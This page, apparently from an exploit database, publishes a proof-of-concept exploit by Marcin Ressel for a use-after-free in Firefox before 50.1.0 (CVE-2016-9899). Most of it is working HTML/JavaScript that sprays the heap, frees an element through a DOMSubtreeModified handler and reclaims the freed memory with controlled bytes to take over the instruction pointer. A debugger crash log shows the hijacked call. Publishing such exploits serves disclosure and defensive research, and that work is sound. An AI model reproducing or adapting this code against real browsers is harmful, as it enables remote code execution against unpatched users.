Mozilla Firefox < 50.1.0 - Use After Free

2017.01.14
Credit: Marcin Ressel
Risk: High
Local: No
Remote: Yes
CWE: N/A

<!DOCTYPE html> <html> <head> <!-- <meta http-equiv="refresh" content="1"/> --> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="Expires" content="0" /> <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" /> <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" /> <meta http-equiv="Pragma" content="no-cache" /> <style type="text/css"> body{ background-color:lime; font-color:red; }; </style> <script type='text/javascript'></script> <script type="text/javascript" language="JavaScript"> /* * Mozilla Firefox < 50.1.0 Use-After-Free POC * Author: Marcin Ressel * Date: 13.01.2017 * Vendor Homepage: www.mozilla.org * Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/ * Version: < 50.1.0 * Tested on: Windows 7 (x64) Firefox 32 && 64 bit * CVE: CVE-2016-9899 ************************************************* * (b1c.5e0): Access violation - code c0000005 (first chance) * First chance exceptions are reported before any exception handling. * This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program Files (x86)Mozilla Firefox\xul.dll - * eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580 * eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0 nv up ei pl nz na pe nc * cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 * xul!mozilla::net::LoadInfo::AddRef+0x3dd41: * 6d7cc44c ff12 call dword ptr [edx] ds:002b:4543484f=???????? * 0:000> dd eax * 0f804c00 4543484f 91919191 91919191 91919191 * 0f804c10 91919191 91919191 91919191 91919191 * 0f804c20 91919191 91919191 91919191 91919191 * 0f804c30 91919191 91919191 91919191 91919191 * 0f804c40 91919191 91919191 91919191 91919191 * 0f804c50 91919191 91919191 91919191 91919191 * 0f804c60 91919191 91919191 91919191 91919191 * 0f804c70 91919191 91919191 91919191 91919191 * */ var doc = null; var cnt = 0; function m(blocks,size) { var arr = []; for(var i=0;i<blocks;i++) { arr[i] = new Array(size); for(var j=0;j<size;j+=2) { arr[i][j] = 0x41414141; arr[i][j+1] = 0x42424242; } } return arr; } function handler() { //free if(cnt > 0) return; doc.body.appendChild(document.createElement("audio")).remove(); m(1024,1024); ++cnt; } function trigger() { if(cnt > 0) { var pl = new Array(); doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false); for(var i=0;i<4096;i++) { //replace pl[i]=new Uint8Array(1000); pl[i][0] = 0x4F; pl[i][1] = 0x48; pl[i][2] = 0x43; pl[i][3] = 0x45; //eip for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91; // pl[i] = document.createElement('media'); //document.body.appendChild(pl[i]); } window.pl = pl document.getElementById("t1").remove(); //re-use } } function testcase() { var df = m(4096,1000); document.body.setAttribute('df',df); doc = document.getElementById("t1").contentWindow.document; doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false); doc.getElementsByTagName("*")[0].style = "ANNNY"; setInterval("trigger();",1000); } </script> <title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title> </head> <body onload='testcase();'> <iframe src='about:blank' id='t1' width="100%"></iframe> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top